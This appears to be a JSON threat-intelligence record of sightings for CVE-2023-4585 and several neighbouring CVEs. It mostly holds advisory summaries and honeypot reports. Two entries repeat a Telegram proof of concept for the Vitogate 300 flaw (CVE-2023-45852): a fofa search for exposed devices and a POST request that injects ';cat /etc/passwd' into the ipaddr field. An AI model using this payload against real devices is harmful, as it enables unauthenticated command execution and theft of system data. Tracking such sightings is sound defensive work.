{"vulnerability": "CVE-2023-4585", "sightings": [{"uuid": "3c1ce37f-0369-4f17-8a17-41361ab582df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-45852", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-27)", "content": "", "creation_timestamp": "2025-03-27T00:00:00.000000Z"}, {"uuid": "a35f22e4-9ee0-4def-b296-808089532f49", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-45853", "type": "seen", "source": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-044-09", "content": "", "creation_timestamp": "2025-02-13T11:00:00.000000Z"}, {"uuid": "f022238e-d866-42d7-8f66-b1fda1d48bf1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-45853", "type": "seen", "source": "https://gist.github.com/ndouglas-cloudsmith/44943d8a7c6ed78006cf65ec5bb79d27", "content": "", "creation_timestamp": "2025-06-10T14:19:59.000000Z"}, {"uuid": "8a1136a5-6439-47db-a102-e634172f11d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-45853", "type": "seen", "source": "https://gist.github.com/ndouglas-cloudsmith/686c24676d9281ea13827f50230bb60b", "content": "", "creation_timestamp": "2025-06-17T11:41:04.000000Z"}, {"uuid": "67a20398-7c37-4461-b00b-80e07cddbe4f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-45852", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-05)", "content": "", "creation_timestamp": "2025-10-05T00:00:00.000000Z"}, {"uuid": "359d0df9-88cf-49a8-9b6f-cd25933e1491", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-45852", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-29)", "content": "", "creation_timestamp": "2025-07-29T00:00:00.000000Z"}, {"uuid": "10a40b15-1c44-4c8d-94dd-16157cda644c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-45857", "type": "seen", "source": "https://gist.github.com/siddharthharshraj/29a727b06da68abeed8abdfa8c343556", "content": "", "creation_timestamp": "2026-03-04T22:10:15.000000Z"}, {"uuid": "a007e897-c528-4153-9fc6-50a88f0df0d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-45852", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-09)", "content": "", "creation_timestamp": "2026-03-09T00:00:00.000000Z"}, {"uuid": "7580e0f1-77af-482a-939b-da552e7f8f3a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-45852", "type": "published-proof-of-concept", "source": "https://t.me/Teamx1945x/6863", "content": "CVE-2023-45852\n\nfofa  title=\"Vitogate 300\"\n\nPOST /cgi-bin/vitogate.cgi HTTP/1.1\nHost: 127.0.0.1\nContent-Type: application/json\n\n{\"method\":\"put\",\"form\":\"form-4-8\",\"session\":\"\",\"params\":{\"ipaddr\":\"{{randstr}};cat /etc/passwd\"}}\n\ncat /etc/passwd\n\n#poc #exploit", "creation_timestamp": "2024-06-08T00:15:49.000000Z"}, {"uuid": "7a33386c-7f34-43d7-92d6-2ce25dec3a0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-45857", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/5565", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aCVE-2023-45857\u306e\u6319\u52d5\u3092\u78ba\u8a8d\u3059\u308b\u30c7\u30e2\nURL\uff1ahttps://github.com/intercept6/CVE-2023-45857-Demo\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-10-26T04:24:41.000000Z"}, {"uuid": "75298224-6cd8-47ef-8d8e-9947a92d3b7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "c933734a-9be8-4142-889e-26e95c752803", "vulnerability": "CVE-2023-45853", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/7d76c81b-048b-457f-800a-dc4e82520dd3", "content": "", "creation_timestamp": "2025-02-14T16:37:45.788097Z"}, {"uuid": "be144c1e-e3c3-454d-aee3-4f71d3036412", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-45852", "type": "published-proof-of-concept", "source": "Telegram/Lbe1p7J_4UrgGxDKp8IA3nPHBW7KShSv3HLtF2U-f5RWFw", "content": "", "creation_timestamp": "2024-01-26T02:15:27.000000Z"}, {"uuid": "f64932a4-61ab-48c1-a433-05a9b0b7a251", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-45852", "type": "published-proof-of-concept", "source": "Telegram/BUq-I64O_2qCWh7EKaq9hyKm7meoxoNShmWBZXweoLJ3ZA", "content": "", "creation_timestamp": "2024-01-18T15:36:02.000000Z"}, {"uuid": "9a11b1a3-29b3-44e7-9028-5fa4c3a2e3a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-45854", "type": "seen", "source": "https://t.me/cvedetector/5753", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2023-45854 - Shopkit Business Logic Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2023-45854 \nPublished : Sept. 16, 2024, 6:15 p.m. | 38\u00a0minutes ago \nDescription : A Business Logic vulnerability in Shopkit 1.0 allows an attacker to add products with negative quantities to the shopping cart via the qtd parameter in the add-to-cart function. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"16 Sep 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-09-16T21:12:57.000000Z"}, {"uuid": "f6cb8e10-b50a-47e9-ba57-a154e181ffe7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-45852", "type": "published-proof-of-concept", "source": "Telegram/-CUWKwBEcwVjAmflph_UE2rR4naQmsMl4HRbXghsNm8kRw", "content": "", "creation_timestamp": "2023-10-31T19:52:09.000000Z"}, {"uuid": "3f75802a-6655-4d02-8478-2388130944cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-45852", "type": "published-proof-of-concept", "source": "Telegram/u-C24l9XxHu7bdFiH5W60ovVUpL1uXNndLlHucoZU6-x0g", "content": "", "creation_timestamp": "2024-01-18T05:30:12.000000Z"}, {"uuid": "99ea2ea5-5449-4e6b-a7a3-67a4368a69b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-4585", "type": "seen", "source": "https://t.me/cibsecurity/70200", "content": "\u203c CVE-2023-4585 \u203c\n\nMemory safety bugs present in Firefox 116, Firefox ESR 115.1, and Thunderbird 115.1. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox &lt; 117, Firefox ESR &lt; 115.2, and Thunderbird &lt; 115.2.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-09-11T12:22:14.000000Z"}, {"uuid": "aa94ee01-ab5e-47c3-9812-c4723f9d90f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-45857", "type": "seen", "source": "https://t.me/arpsyndicate/2700", "content": "#ExploitObserverAlert\n\nCVE-2023-45857\n\nDESCRIPTION: Exploit Observer has 10 entries related to CVE-2023-45857. An issue discovered in Axios 1.5.1 inadvertently reveals the confidential XSRF-TOKEN stored in cookies by including it in the HTTP header X-XSRF-TOKEN for every request made to any host allowing attackers to view sensitive information.\n\nFIRST-EPSS: 0.000550000\nNVD-IS: 3.6\nNVD-ES: 2.8", "creation_timestamp": "2024-01-09T01:30:12.000000Z"}, {"uuid": "e5fb0d25-23d7-4ece-8168-fd300aac53d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-45853", "type": "seen", "source": "https://t.me/arpsyndicate/364", "content": "#ExploitObserverAlert\n\nCVE-2023-45853\n\nDESCRIPTION: Exploit Observer has 12 entries related to CVE-2023-45853. MiniZip in zlib through 1.3 has an integer overflow and resultant heap-based buffer overflow in zipOpenNewFileInZip4_64 via a long filename, comment, or extra field. NOTE: MiniZip is not a supported part of the zlib product.\n\nFIRST-EPSS: 0.000980000\nNVD-IS: 5.9\nNVD-ES: 3.9", "creation_timestamp": "2023-11-22T22:55:24.000000Z"}, {"uuid": "d865a6ef-16a7-41bb-af0b-25a8c848e0fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-45853", "type": "seen", "source": "https://t.me/cibsecurity/72275", "content": "\u203c CVE-2023-45853 \u203c\n\nMiniZip in zlib through 1.3 has an integer overflow and resultant heap-based buffer overflow in zipOpenNewFileInZip4_64 via a long filename, comment, or extra field. NOTE: MiniZip is not a supported part of the zlib product.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-10-14T07:29:26.000000Z"}, {"uuid": "9a4f8a4a-829c-4470-a6a6-276c43164a3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-45852", "type": "published-proof-of-concept", "source": "https://t.me/arvinclub1/1048", "content": "\u26a0\ufe0f\u26a0\ufe0f#CVE-2023-45852: Vitogate 300 Authentication Bypass and RCE                                    https://github.com/Push3AX/vul/blob/main/viessmann/Vitogate300_RCE.md", "creation_timestamp": "2023-12-07T10:47:27.000000Z"}, {"uuid": "1ad57394-7fe6-4cb4-a5e3-2ddfc6269965", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-45853", "type": "seen", "source": "https://t.me/arpsyndicate/782", "content": "#ExploitObserverAlert\n\nCVE-2023-45853\n\nDESCRIPTION: Exploit Observer has 13 entries related to CVE-2023-45853. MiniZip in zlib through 1.3 has an integer overflow and resultant heap-based buffer overflow in zipOpenNewFileInZip4_64 via a long filename, comment, or extra field. NOTE: MiniZip is not a supported part of the zlib product.\n\nFIRST-EPSS: 0.000980000\nNVD-IS: 5.9\nNVD-ES: 3.9", "creation_timestamp": "2023-11-29T17:44:15.000000Z"}, {"uuid": "0a7feab4-e10c-4c80-b61c-7503ffe14f32", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-45852", "type": "seen", "source": "https://t.me/cibsecurity/72279", "content": "\u203c CVE-2023-45852 \u203c\n\nIn Vitogate 300 2.1.3.0, /cgi-bin/vitogate.cgi allows an unauthenticated attacker to bypass authentication and execute arbitrary commands via shell metacharacters in the ipaddr params JSON data for the put method.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-10-14T07:29:31.000000Z"}, {"uuid": "624c981d-c883-4e9d-950c-02cdad7b543f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-45859", "type": "seen", "source": "https://t.me/ctinow/208282", "content": "https://ift.tt/ZFgi84z\nCVE-2023-45859 | Hazelcast on Hazelcast Client Protocol permissions (GHSA-xh6m-7cr7-xx66)", "creation_timestamp": "2024-03-14T23:31:30.000000Z"}, {"uuid": "2bf8ad66-a78c-44a6-ab70-5cc042a57ca9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-45859", "type": "seen", "source": "https://t.me/ctinow/195980", "content": "https://ift.tt/hLKsoj2\nCVE-2023-45859", "creation_timestamp": "2024-02-28T23:27:11.000000Z"}, {"uuid": "0b5736ec-9685-4cc5-863e-2e75032277c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-45859", "type": "seen", "source": "https://t.me/ctinow/195965", "content": "https://ift.tt/hLKsoj2\nCVE-2023-45859", "creation_timestamp": "2024-02-28T23:26:55.000000Z"}, {"uuid": "0084b13e-b25d-4a49-ab96-50bc885071f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-45852", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/1867", "content": "CVE-2023-45852\n\nfofa  title=\"Vitogate 300\"\n\nPOST /cgi-bin/vitogate.cgi HTTP/1.1\nHost: 127.0.0.1\nContent-Type: application/json\n\n{\"method\":\"put\",\"form\":\"form-4-8\",\"session\":\"\",\"params\":{\"ipaddr\":\"{{randstr}};cat /etc/passwd\"}}\n\ncat /etc/passwd\n\n#poc #exploit", "creation_timestamp": "2024-01-18T09:33:45.000000Z"}]}